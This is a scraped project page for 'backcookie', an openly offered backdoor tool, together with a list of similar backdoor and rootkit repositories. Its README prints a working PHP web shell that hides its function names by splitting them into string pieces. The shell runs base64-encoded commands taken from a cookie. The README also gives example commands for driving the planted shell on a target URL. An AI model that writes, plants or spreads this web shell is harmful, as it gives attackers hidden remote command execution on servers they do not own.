All Projects → jofpin → backcookie

jofpin / backcookie

Licence: other
Small backdoor using cookie.

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to backcookie

RSB-Framework
Windows/Linux - ReverseShellBackdoor Framework
Stars: ✭ 44 (-10.2%)
Mutual labels:  backdoor
satan
🔓 x86 Linux Kernel rootkit for Debian 9 (4.9.0-11-686-pae)
Stars: ✭ 31 (-36.73%)
Mutual labels:  backdoor
next-cookie
Cookie serializer and deserializer library for next.js
Stars: ✭ 190 (+287.76%)
Mutual labels:  cookie
hapi-doorkeeper
User authentication for web servers
Stars: ✭ 14 (-71.43%)
Mutual labels:  cookie
1c http
Подсистема 1С для работы с HTTP
Stars: ✭ 48 (-2.04%)
Mutual labels:  cookie
SubRosa
Basic tool to automate backdooring PE files
Stars: ✭ 48 (-2.04%)
Mutual labels:  backdoor
disctopia-c2
Windows Remote Administration Tool that uses Discord as C2
Stars: ✭ 216 (+340.82%)
Mutual labels:  backdoor
titanium-cookies
Me want cookies. OM NOM NOM.
Stars: ✭ 20 (-59.18%)
Mutual labels:  cookie
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 601 (+1126.53%)
Mutual labels:  backdoor
Backdoor
A backdoor that runs on Linux and Windows
Stars: ✭ 36 (-26.53%)
Mutual labels:  backdoor
session
Aplus Framework Session Library
Stars: ✭ 170 (+246.94%)
Mutual labels:  cookie
ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (+522.45%)
Mutual labels:  backdoor
single-sign-on-out-jwt-cookie-redis-java-springboot-freemarker
Single Sign Out, Scalable Authentication Example with JSON Web Token (JWT), Spring Boot and Redis
Stars: ✭ 15 (-69.39%)
Mutual labels:  cookie
angular2-cool-http
Cool features over angular2 HttpClient
Stars: ✭ 37 (-24.49%)
Mutual labels:  cookie
MSBackdoor
[Discontinued] Transform your payload into fake powerpoint (.ppt)
Stars: ✭ 35 (-28.57%)
Mutual labels:  backdoor
Client-Storage
🗄 Bulletproof persistent Client storage, works with disabled Cookies and/or localStorage
Stars: ✭ 15 (-69.39%)
Mutual labels:  cookie
PHP-Session
PHP library for handling sessions.
Stars: ✭ 54 (+10.2%)
Mutual labels:  cookie
burp-cookie-porter
一个可快速“搬运”cookie的Burp Suite插件
Stars: ✭ 22 (-55.1%)
Mutual labels:  cookie
react-cookie-law
React Cookie Law is a cookie-info banner compliance with the GDPR and the EU cookie law. It allows the user to give consent in a granular way.
Stars: ✭ 103 (+110.2%)
Mutual labels:  cookie
BackHAck
Backdoor Generator | Linux & Windows | FUD AV .py .exe
Stars: ✭ 61 (+24.49%)
Mutual labels:  backdoor

backcookie

Small backdoor using cookie.

==========

<?php
# the code of the backdoor used
$bOne = "pa"."ss"."th"."ru";
$bTwo = "ba"."se"."64"."_"."de"."co"."de";
$bKey = "yourcookie"; # conection backdoor
$bOne($bTwo($_COOKIE[$bKey]));
?>
Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Custom command (binfo), You get objective information

@pwned:~$ binfo

Custom command (exit), to exit.

@pwned:~$ exit

Happy hacking!


Copyright, 2013 - 2016 by Jose Pino


Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].